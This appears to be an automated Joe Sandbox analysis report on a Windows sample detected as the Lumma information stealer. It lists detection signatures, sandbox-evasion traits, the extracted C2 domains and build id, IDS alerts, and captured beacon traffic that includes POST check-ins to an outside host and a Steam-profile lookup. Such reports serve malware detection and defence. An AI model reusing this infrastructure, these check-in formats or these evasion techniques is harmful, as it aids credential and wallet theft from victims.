Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1533037
MD5:b7c6caceb7f0ff55a6d276ef2d4505af
SHA1:b50a32531b09099caa47ce317a89c4dd38b0a7f2
SHA256:8c67a0c7241778a14e218933a14a80797a45fca028aff527b42b2f6192a68387
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • file.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B7C6CACEB7F0FF55A6D276EF2D4505AF)
    • WerFault.exe (PID: 7964 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7576 -s 1940 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["clearancek.site", "eaglepawnoy.store", "spirittunek.store", "licendfilteo.site", "studennotediw.store", "mobbipenju.store", "bathdoomgaz.store", "dissapoiznw.store"], "Build id": "4SD0y4--legendaryy"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:14.459626+020020546531A Network Trojan was detected192.168.2.749701104.21.53.8443TCP
    2024-10-14T11:03:15.541991+020020546531A Network Trojan was detected192.168.2.749707104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:14.459626+020020498361A Network Trojan was detected192.168.2.749701104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:15.541991+020020498121A Network Trojan was detected192.168.2.749707104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.668185+020020564771Domain Observed Used for C2 Detected192.168.2.7515621.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.568759+020020564711Domain Observed Used for C2 Detected192.168.2.7556651.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.640630+020020564811Domain Observed Used for C2 Detected192.168.2.7520011.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.628627+020020564831Domain Observed Used for C2 Detected192.168.2.7610341.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.800129+020020564731Domain Observed Used for C2 Detected192.168.2.7516541.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.616617+020020564851Domain Observed Used for C2 Detected192.168.2.7504821.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.686786+020020564751Domain Observed Used for C2 Detected192.168.2.7639751.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:11.653259+020020564791Domain Observed Used for C2 Detected192.168.2.7572361.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T11:03:13.680682+020028586661Domain Observed Used for C2 Detected192.168.2.749699104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: file.exe.7576.4.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["clearancek.site", "eaglepawnoy.store", "spirittunek.store", "licendfilteo.site", "studennotediw.store", "mobbipenju.store", "bathdoomgaz.store", "dissapoiznw.store"], "Build id": "4SD0y4--legendaryy"}
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 21%Perma Link
    Source: https://sergei-esenin.com/apiMVirustotal: Detection: 13%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: https://eaglepawnoy.store:443/apiVirustotal: Detection: 21%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: https://sergei-esenin.com:443/apifiles/76561199724331900Virustotal: Detection: 9%Perma Link
    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 18%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exeJoe Sandbox ML: detected
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: clearancek.site
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: licendfilteo.site
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: spirittunek.store
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: bathdoomgaz.store
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: studennotediw.store
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: dissapoiznw.store
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: eaglepawnoy.store
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: mobbipenju.store
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: clearancek.site
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: - Screen Resoluton:
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: Workgroup: -
    Source: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49707 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh4_2_00AE99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00AAD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00AAD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_00AAFCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_00AB6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]4_2_00AA49A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h4_2_00AE3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h4_2_00ABD961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_00AB42FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax4_2_00AB1ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax4_2_00AB1A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h4_2_00AE4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]4_2_00AA5A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]4_2_00AB1BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_00AB3BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax4_2_00AAA300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh4_2_00AE9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00AE9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh4_2_00AE9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h4_2_00ACCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00ACCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h4_2_00ACCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h4_2_00ABB410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]4_2_00ACC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00ABD457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]4_2_00AA8590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_00AB6536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00AC9510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh4_2_00ACFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]4_2_00AA6EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h4_2_00AB6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]4_2_00AABEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]4_2_00AB1E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_00AB0EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_00AB6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00AE5700

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:55665 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:61034 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:57236 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:52001 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:63975 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:50482 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:51654 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:51562 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49699 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49707 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49707 -> 104.21.53.8:443
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=AqhxCjlq_E3AgO9n.7dMsBL7zg.kGWAWYSyOi_3alMM-1728896594-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
